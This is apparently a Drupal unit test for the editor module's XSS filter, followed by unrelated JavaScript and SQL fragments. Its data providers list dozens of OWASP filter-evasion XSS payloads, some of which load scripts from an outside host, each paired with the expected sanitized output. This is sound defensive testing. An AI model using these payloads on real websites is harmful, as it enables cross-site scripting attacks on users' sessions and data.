use Drupal\Tests\UnitTestCase;
use Drupal\filter\Plugin\FilterInterface;
/**
* @coversDefaultClass \Drupal\editor\EditorXssFilter\Standard
* @group editor
*/
class StandardTest extends UnitTestCase {
/**
* The mocked text format configuration entity.
*
* @var \Drupal\filter\Entity\FilterFormat|\PHPUnit_Framework_MockObject_MockObject
*/
protected $format;
protected function setUp() {
// Mock text format configuration entity object.
$this->format = $this->getMockBuilder('\Drupal\filter\Entity\FilterFormat')
->disableOriginalConstructor()
->getMock();
$this->format->expects($this->any())
->method('getFilterTypes')
->will($this->returnValue([FilterInterface::TYPE_HTML_RESTRICTOR]));
$restrictions = [
'allowed' => [
'p' => TRUE,
'a' => TRUE,
'*' => [
'style' => FALSE,
'on*' => FALSE,
],
],
];
$this->format->expects($this->any())
->method('getHtmlRestrictions')
->will($this->returnValue($restrictions));
}
/**
* Provides test data for testFilterXss().
*
* @see \Drupal\Tests\editor\Unit\editor\EditorXssFilter\StandardTest::testFilterXss()
*/
public function providerTestFilterXss() {
$data = [];
$data[] = ['<p>Hello, world!</p><unknown>Pink Fairy Armadillo</unknown>', '<p>Hello, world!</p><unknown>Pink Fairy Armadillo</unknown>'];
$data[] = ['<p style="color:red">Hello, world!</p><unknown>Pink Fairy Armadillo</unknown>', '<p>Hello, world!</p><unknown>Pink Fairy Armadillo</unknown>'];
$data[] = ['<p>Hello, world!</p><unknown>Pink Fairy Armadillo</unknown><script>alert("evil");</script>', '<p>Hello, world!</p><unknown>Pink Fairy Armadillo</unknown>alert("evil");'];
$data[] = ['<p>Hello, world!</p><unknown>Pink Fairy Armadillo</unknown><a href="javascript:alert(1)">test</a>', '<p>Hello, world!</p><unknown>Pink Fairy Armadillo</unknown><a href="alert(1)">test</a>'];
// All cases listed on https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
// No Filter Evasion.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#No_Filter_Evasion
$data[] = ['<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>', ''];
// Image XSS using the JavaScript directive.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Image_XSS_using_the_JavaScript_directive
$data[] = ['<IMG SRC="javascript:alert(\'XSS\');">', '<IMG src="alert('XSS');">'];
// No quotes and no semicolon.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#No_quotes_and_no_semicolon
$data[] = ['<IMG SRC=javascript:alert(\'XSS\')>', '<IMG>'];
// Case insensitive XSS attack vector.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Case_insensitive_XSS_attack_vector
$data[] = ['<IMG SRC=JaVaScRiPt:alert(\'XSS\')>', '<IMG>'];
// HTML entities.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#HTML_entities
$data[] = ['<IMG SRC=javascript:alert("XSS")>', '<IMG>'];
// Grave accent obfuscation.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Grave_accent_obfuscation
$data[] = ['<IMG SRC=`javascript:alert("RSnake says, \'XSS\'")`>', '<IMG>'];
// Malformed A tags.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Malformed_A_tags
$data[] = ['<a onmouseover="alert(document.cookie)">xxs link</a>', '<a>xxs link</a>'];
$data[] = ['<a onmouseover=alert(document.cookie)>xxs link</a>', '<a>xxs link</a>'];
// Malformed IMG tags.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Malformed_IMG_tags
$data[] = ['<IMG """><SCRIPT>alert("XSS")</SCRIPT>">', '<IMG>alert("XSS")">'];
// fromCharCode.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#fromCharCode
$data[] = ['<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>', '<IMG src="alert(String.fromCharCode(88,83,83))">'];
// Default SRC tag to get past filters that check SRC domain.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Default_SRC_tag_to_get_past_filters_that_check_SRC_domain
$data[] = ['<IMG SRC=# onmouseover="alert(\'xxs\')">', '<IMG src="#">'];
// Default SRC tag by leaving it empty.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Default_SRC_tag_by_leaving_it_empty
$data[] = ['<IMG SRC= onmouseover="alert(\'xxs\')">', '<IMG nmouseover="alert('xxs')">'];
// Default SRC tag by leaving it out entirely.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Default_SRC_tag_by_leaving_it_out_entirely
$data[] = ['<IMG onmouseover="alert(\'xxs\')">', '<IMG>'];
// Decimal HTML character references.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Decimal_HTML_character_references
$data[] = ['<IMG SRC=javascript:alert('XSS')>', '<IMG src="alert('XSS')">'];
// Decimal HTML character references without trailing semicolons.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Decimal_HTML_character_references_without_trailing_semicolons
$data[] = ['<IMG SRC=javascript:alert('XSS')>', '<IMG src="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">'];
// Hexadecimal HTML character references without trailing semicolons.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Hexadecimal_HTML_character_references_without_trailing_semicolons
$data[] = ['<IMG SRC=javascript:alert('XSS')>', '<IMG src="&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29">'];
// Embedded tab.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Embedded_tab
$data[] = ['<IMG SRC="jav ascript:alert(\'XSS\');">', '<IMG src="alert('XSS');">'];
// Embedded Encoded tab.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Embedded_Encoded_tab
$data[] = ['<IMG SRC="jav	ascript:alert(\'XSS\');">', '<IMG src="alert('XSS');">'];
// Embedded newline to break up XSS.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Embedded_newline_to_break_up_XSS
$data[] = ['<IMG SRC="jav
ascript:alert(\'XSS\');">', '<IMG src="alert('XSS');">'];
// Embedded carriage return to break up XSS.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Embedded_carriage_return_to_break_up_XSS
$data[] = ['<IMG SRC="jav
ascript:alert(\'XSS\');">', '<IMG src="alert('XSS');">'];
// Null breaks up JavaScript directive.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Null_breaks_up_JavaScript_directive
$data[] = ["<IMG SRC=java\0script:alert(\"XSS\")>", '<IMG>'];
// Spaces and meta chars before the JavaScript in images for XSS.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Spaces_and_meta_chars_before_the_JavaScript_in_images_for_XSS
// @fixme This dataset currently fails under 5.4 because of
// https://www.drupal.org/node/1210798. Restore after it's fixed.
if (version_compare(PHP_VERSION, '5.4.0', '<')) {
$data[] = ['<IMG SRC="  javascript:alert(\'XSS\');">', '<IMG src="alert('XSS');">'];
}
// Non-alpha-non-digit XSS.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Non-alpha-non-digit_XSS
$data[] = ['<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>', ''];
$data[] = ['<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>', '<BODY>'];
$data[] = ['<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>', ''];
// Extraneous open brackets.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Extraneous_open_brackets
$data[] = ['<<SCRIPT>alert("XSS");//<</SCRIPT>', '<alert("XSS");//<'];
// No closing script tags.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#No_closing_script_tags
$data[] = ['<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >', ''];
// Protocol resolution in script tags.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Protocol_resolution_in_script_tags
$data[] = ['<SCRIPT SRC=//ha.ckers.org/.j>', ''];
// Half open HTML/JavaScript XSS vector.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Half_open_HTML.2FJavaScript_XSS_vector
$data[] = ['<IMG SRC="javascript:alert(\'XSS\')"', '<IMG src="alert('XSS')">'];
// Double open angle brackets.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Double_open_angle_brackets
// @see http://ha.ckers.org/blog/20060611/hotbot-xss-vulnerability/ to
// understand why this is a vulnerability.
$data[] = ['<iframe src=http://ha.ckers.org/scriptlet.html <', '<iframe src="http://ha.ckers.org/scriptlet.html">'];
// Escaping JavaScript escapes.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Escaping_JavaScript_escapes
// This one is irrelevant for Drupal; we *never* output any JavaScript code
// that depends on the URL's query string.
// End title tag.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#End_title_tag
$data[] = ['</TITLE><SCRIPT>alert("XSS");</SCRIPT>', '</TITLE>alert("XSS");'];
// INPUT image.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#INPUT_image
$data[] = ['<INPUT TYPE="IMAGE" SRC="javascript:alert(\'XSS\');">', '<INPUT type="IMAGE" src="alert('XSS');">'];
// BODY image.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#BODY_image
$data[] = ['<BODY BACKGROUND="javascript:alert(\'XSS\')">', '<BODY background="alert('XSS')">'];
// IMG Dynsrc.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#IMG_Dynsrc
$data[] = ['<IMG DYNSRC="javascript:alert(\'XSS\')">', '<IMG dynsrc="alert('XSS')">'];
// IMG lowsrc.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#IMG_lowsrc
$data[] = ['<IMG LOWSRC="javascript:alert(\'XSS\')">', '<IMG lowsrc="alert('XSS')">'];
// List-style-image.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#List-style-image
$data[] = ['<STYLE>li {list-style-image: url("javascript:alert(\'XSS\')");}</STYLE><UL><LI>XSS</br>', 'li {list-style-image: url("javascript:alert(\'XSS\')");}<UL><LI>XSS</br>'];
// VBscript in an image.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#VBscript_in_an_image
$data[] = ['<IMG SRC=\'vbscript:msgbox("XSS")\'>', '<IMG src=\'msgbox("XSS")\'>'];
// Livescript (older versions of Netscape only).
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Livescript_.28older_versions_of_Netscape_only.29
$data[] = ['<IMG SRC="livescript:[code]">', '<IMG src="[code]">'];
// BODY tag.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#BODY_tag
$data[] = ['<BODY ONLOAD=alert(\'XSS\')>', '<BODY>'];
// Event handlers.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Event_Handlers
$events = [
'onAbort',
'onActivate',
'onAfterPrint',
'onAfterUpdate',
'onBeforeActivate',
'onBeforeCopy',
'onBeforeCut',
'onBeforeDeactivate',
'onBeforeEditFocus',
'onBeforePaste',
'onBeforePrint',
'onBeforeUnload',
'onBeforeUpdate',
'onBegin',
'onBlur',
'onBounce',
'onCellChange',
'onChange',
'onClick',
'onContextMenu',
'onControlSelect',
'onCopy',
'onCut',
'onDataAvailable',
'onDataSetChanged',
'onDataSetComplete',
'onDblClick',
'onDeactivate',
'onDrag',
'onDragEnd',
'onDragLeave',
'onDragEnter',
'onDragOver',
'onDragDrop',
'onDragStart',
'onDrop',
'onEnd',
'onError',
'onErrorUpdate',
'onFilterChange',
'onFinish',
'onFocus',
'onFocusIn',
'onFocusOut',
'onHashChange',
'onHelp',
'onInput',
'onKeyDown',
'onKeyPress',
'onKeyUp',
'onLayoutComplete',
'onLoad',
'onLoseCapture',
'onMediaComplete',
'onMediaError',
'onMessage',
'onMousedown',
'onMouseEnter',
'onMouseLeave',
'onMouseMove',
'onMouseOut',
'onMouseOver',
'onMouseUp',
'onMouseWheel',
'onMove',
'onMoveEnd',
'onMoveStart',
'onOffline',
'onOnline',
'onOutOfSync',
'onPaste',
'onPause',
'onPopState',
'onProgress',
'onPropertyChange',
'onReadyStateChange',
'onRedo',
'onRepeat',
'onReset',
'onResize',
'onResizeEnd',
'onResizeStart',
'onResume',
'onReverse',
'onRowsEnter',
'onRowExit',
'onRowDelete',
'onRowInserted',
'onScroll',
'onSeek',
'onSelect',
'onSelectionChange',
'onSelectStart',
'onStart',
'onStop',
'onStorage',
'onSyncRestored',
'onSubmit',
'onTimeError',
'onTrackChange',
'onUndo',
'onUnload',
'onURLFlip',
];
foreach ($events as $event) {
$data[] = ['<p ' . $event . '="javascript:alert(\'XSS\');">Dangerous llama!</p>', '<p>Dangerous llama!</p>'];
}
// BGSOUND.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#BGSOUND
$data[] = ['<BGSOUND SRC="javascript:alert(\'XSS\');">', '<BGSOUND src="alert('XSS');">'];
// & JavaScript includes.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#.26_JavaScript_includes
$data[] = ['<BR SIZE="&{alert(\'XSS\')}">', '<BR size="">'];
// STYLE sheet.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#STYLE_sheet
$data[] = ['<LINK REL="stylesheet" HREF="javascript:alert(\'XSS\');">', ''];
// Remote style sheet.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Remote_style_sheet
$data[] = ['<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">', ''];
// Remote style sheet part 2.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Remote_style_sheet_part_2
$data[] = ['<STYLE>@import\'http://ha.ckers.org/xss.css\';</STYLE>', '@import\'http://ha.ckers.org/xss.css\';'];
// Remote style sheet part 3.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Remote_style_sheet_part_3
$data[] = ['<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">', '<META http-equiv="Link">; REL=stylesheet">'];
// Remote style sheet part 4.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Remote_style_sheet_part_4
$data[] = ['<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>', 'BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}'];
// STYLE tags with broken up JavaScript for XSS.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#STYLE_tags_with_broken_up_JavaScript_for_XSS
$data[] = ['<STYLE>@im\port\'\ja\vasc\ript:alert("XSS")\';</STYLE>', '@im\port\'\ja\vasc\ript:alert("XSS")\';'];
// STYLE attribute using a comment to break up expression.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#STYLE_attribute_using_a_comment_to_break_up_expression
$data[] = ['<IMG STYLE="xss:expr/*XSS*/ession(alert(\'XSS\'))">', '<IMG>'];
// IMG STYLE with expression.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#IMG_STYLE_with_expression
$data[] = ['exp/*<A STYLE=\'no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("XSS"))\'>', 'exp/*<A>'];
// STYLE tag (Older versions of Netscape only).
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#STYLE_tag_.28Older_versions_of_Netscape_only.29
$data[] = ['<STYLE TYPE="text/javascript">alert(\'XSS\');</STYLE>', 'alert(\'XSS\');'];
// STYLE tag using background-image.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#STYLE_tag_using_background-image
$data[] = ['<STYLE>.XSS{background-image:url("javascript:alert(\'XSS\')");}</STYLE><A CLASS=XSS></A>', '.XSS{background-image:url("javascript:alert(\'XSS\')");}<A class="XSS"></A>'];
// STYLE tag using background.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#STYLE_tag_using_background
$data[] = ['<STYLE type="text/css">BODY{background:url("javascript:alert(\'XSS\')")}</STYLE>', 'BODY{background:url("javascript:alert(\'XSS\')")}'];
// Anonymous HTML with STYLE attribute.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Anonymous_HTML_with_STYLE_attribute
$data[] = ['<XSS STYLE="xss:expression(alert(\'XSS\'))">', '<XSS>'];
// Local htc file.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Local_htc_file
$data[] = ['<XSS STYLE="behavior: url(xss.htc);">', '<XSS>'];
// US-ASCII encoding.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#US-ASCII_encoding
// This one is irrelevant for Drupal; Drupal *always* outputs UTF-8.
// META.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#META
$data[] = ['<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(\'XSS\');">', '<META http-equiv="refresh" content="alert('XSS');">'];
// META using data.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#META_using_data
$data[] = ['<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">', '<META http-equiv="refresh" content="text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">'];
// META with additional URL parameter
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#META
$data[] = ['<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(\'XSS\');">', '<META http-equiv="refresh" content="//;URL=javascript:alert('XSS');">'];
// IFRAME.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#IFRAME
$data[] = ['<IFRAME SRC="javascript:alert(\'XSS\');"></IFRAME>', '<IFRAME src="alert('XSS');"></IFRAME>'];
// IFRAME Event based.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#IFRAME_Event_based
$data[] = ['<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>', '<IFRAME src="#"></IFRAME>'];
// FRAME.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#FRAME
$data[] = ['<FRAMESET><FRAME SRC="javascript:alert(\'XSS\');"></FRAMESET>', '<FRAMESET><FRAME src="alert('XSS');"></FRAMESET>'];
// TABLE.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#TABLE
$data[] = ['<TABLE BACKGROUND="javascript:alert(\'XSS\')">', '<TABLE background="alert('XSS')">'];
// TD.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#TD
$data[] = ['<TABLE><TD BACKGROUND="javascript:alert(\'XSS\')">', '<TABLE><TD background="alert('XSS')">'];
// DIV background-image.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#DIV_background-image
$data[] = ['<DIV STYLE="background-image: url(javascript:alert(\'XSS\'))">', '<DIV>'];
// DIV background-image with unicoded XSS exploit.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#DIV_background-image_with_unicoded_XSS_exploit
$data[] = ['<DIV STYLE="background-image:\0075\0072\006C\0028\'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029\'\0029">', '<DIV>'];
// DIV background-image plus extra characters.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#DIV_background-image_plus_extra_characters
$data[] = ['<DIV STYLE="background-image: url(javascript:alert(\'XSS\'))">', '<DIV>'];
// DIV expression.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#DIV_expression
$data[] = ['<DIV STYLE="width: expression(alert(\'XSS\'));">', '<DIV>'];
// Downlevel-Hidden block.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Downlevel-Hidden_block
$data[] = ['<!--[if gte IE 4]>
<SCRIPT>alert(\'XSS\');</SCRIPT>
<![endif]-->', "\n alert('XSS');\n "];
// BASE tag.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#BASE_tag
$data[] = ['<BASE HREF="javascript:alert(\'XSS\');//">', '<BASE href="alert('XSS');//">'];
// OBJECT tag.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#OBJECT_tag
$data[] = ['<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>', ''];
// Using an EMBED tag you can embed a Flash movie that contains XSS.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Using_an_EMBED_tag_you_can_embed_a_Flash_movie_that_contains_XSS
$data[] = ['<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>', ''];
// You can EMBED SVG which can contain your XSS vector.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#You_can_EMBED_SVG_which_can_contain_your_XSS_vector
$data[] = ['<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>', ''];
// XML data island with CDATA obfuscation.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#XML_data_island_with_CDATA_obfuscation
$data[] = ['<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert(\'XSS\')"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>', '<XML id="xss"><I><B><IMG>cript:alert(\'XSS\')"></B></I></XML><SPAN datasrc="#xss" datafld="B" dataformatas="HTML"></SPAN>'];
// Locally hosted XML with embedded JavaScript that is generated using an XML data island.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Locally_hosted_XML_with_embedded_JavaScript_that_is_generated_using_an_XML_data_island
// This one is irrelevant for Drupal; Drupal disallows XML uploads by
// default.
// HTML+TIME in XML.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#HTML.2BTIME_in_XML
$data[] = ['<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>">', '<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t set attributename="innerHTML">alert("XSS")">'];
// Assuming you can only fit in a few characters and it filters against ".js".
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Assuming_you_can_only_fit_in_a_few_characters_and_it_filters_against_.22.js.22
$data[] = ['<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>', ''];
// IMG Embedded commands.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#IMG_Embedded_commands
// This one is irrelevant for Drupal; this is actually a CSRF, for which
// Drupal has CSRF protection. See https://www.drupal.org/node/178896.
// Cookie manipulation.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Cookie_manipulation
$data[] = ['<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(\'XSS\')</SCRIPT>">', '<META http-equiv="Set-Cookie">alert(\'XSS\')">'];
// UTF-7 encoding.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#UTF-7_encoding
// This one is irrelevant for Drupal; Drupal *always* outputs UTF-8.
// XSS using HTML quote encapsulation.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#XSS_using_HTML_quote_encapsulation
$data[] = ['<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>', '" SRC="http://ha.ckers.org/xss.js">'];
$data[] = ['<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>', '" SRC="http://ha.ckers.org/xss.js">'];
$data[] = ['<SCRIPT a=">" \'\' SRC="http://ha.ckers.org/xss.js"></SCRIPT>', '" \'\' SRC="http://ha.ckers.org/xss.js">'];
$data[] = ['<SCRIPT "a=\'>\'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>', '\'" SRC="http://ha.ckers.org/xss.js">'];
$data[] = ['<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>', '` SRC="http://ha.ckers.org/xss.js">'];
$data[] = ['<SCRIPT a=">\'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>', '\'>" SRC="http://ha.ckers.org/xss.js">'];
$data[] = ['<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>', 'document.write("<SCRI>PT SRC="http://ha.ckers.org/xss.js">'];
// URL string evasion.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#URL_string_evasion
// This one is irrelevant for Drupal; Drupal doesn't forbid linking to some
// sites, it only forbids linking to any protocols other than those that are
// whitelisted.
// Test XSS filtering on data-attributes.
// @see \Drupal\editor\EditorXssFilter::filterXssDataAttributes()
// The following two test cases verify that XSS attack vectors are filtered.
$data[] = ['<img src="butterfly.jpg" data-caption="<script>alert();</script>" />', '<img src="butterfly.jpg" data-caption="alert();" />'];
$data[] = ['<img src="butterfly.jpg" data-caption="<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>" />', '<img src="butterfly.jpg" data-caption="" />'];
// When including HTML-tags as visible content, they are double-escaped.
// This test case ensures that we leave that content unchanged.
$data[] = ['<img src="butterfly.jpg" data-caption="&lt;script&gt;alert();&lt;/script&gt;" />', '<img src="butterfly.jpg" data-caption="&lt;script&gt;alert();&lt;/script&gt;" />'];
return $data;
}
/**
* Tests the method for filtering XSS.
*
* @param string $input
* The input.
* @param string $expected_output
* The expected output.
*
* @dataProvider providerTestFilterXss
*/
public function testFilterXss($input, $expected_output) {
$output = Standard::filterXss($input, $this->format);
$this->assertSame($expected_output, $output);
}
/**
* Tests removing disallowed tags and XSS prevention.
*
* \Drupal\Component\Utility\Xss::filter() has the ability to run in blacklist
* mode, in which it still applies the exact same filtering, with one
* exception: it no longer works with a list of allowed tags, but with a list
* of disallowed tags.
*
* @param string $value
* The value to filter.
* @param string $expected
* The string that is expected to be missing.
* @param string $message
* The assertion message to display upon failure.
* @param array $disallowed_tags
* (optional) The disallowed HTML tags to be passed to \Drupal\Component\Utility\Xss::filter().
*
* @dataProvider providerTestBlackListMode
*/
public function testBlacklistMode($value, $expected, $message, array $disallowed_tags) {
$value = Standard::filter($value, $disallowed_tags);
$this->assertSame($expected, $value, $message);
}
/**
* Data provider for testBlacklistMode().
*
* @see testBlacklistMode()
*
* @return array
* An array of arrays containing the following elements:
* - The value to filter.
* - The value to expect after filtering.
* - The assertion message.
* - (optional) The disallowed HTML tags to be passed to \Drupal\Component\Utility\Xss::filter().
*/
public function providerTestBlackListMode() {
return [
[
'<unknown style="visibility:hidden">Pink Fairy Armadillo</unknown><video src="gerenuk.mp4"><script>alert(0)</script>',
'<unknown>Pink Fairy Armadillo</unknown><video src="gerenuk.mp4">alert(0)',
'Disallow only the script tag',
['script']
],
[
'<unknown style="visibility:hidden">Pink Fairy Armadillo</unknown><video src="gerenuk.mp4"><script>alert(0)</script>',
'<unknown>Pink Fairy Armadillo</unknown>alert(0)',
'Disallow both the script and video tags',
['script', 'video']
],
// No real use case for this, but it is an edge case we must ensure works.
[
'<unknown style="visibility:hidden">Pink Fairy Armadillo</unknown><video src="gerenuk.mp4"><script>alert(0)</script>',
'<unknown>Pink Fairy Armadillo</unknown><video src="gerenuk.mp4"><script>alert(0)</script>',
'Disallow no tags',
[]
],
];
}
}
| {
"pile_set_name": "Github"
} |
/**
* Header comment
*/
const one = require('one');
/**
* Function description.
*/
function foo() {
one();
}
| {
"pile_set_name": "Github"
} |
# Add issue_backlog table
CREATE TABLE `issue_backlog`(
`id` INT UNSIGNED NOT NULL AUTO_INCREMENT,
`user_id` INT UNSIGNED NOT NULL,
`issues` BLOB NOT NULL,
PRIMARY KEY (`id`),
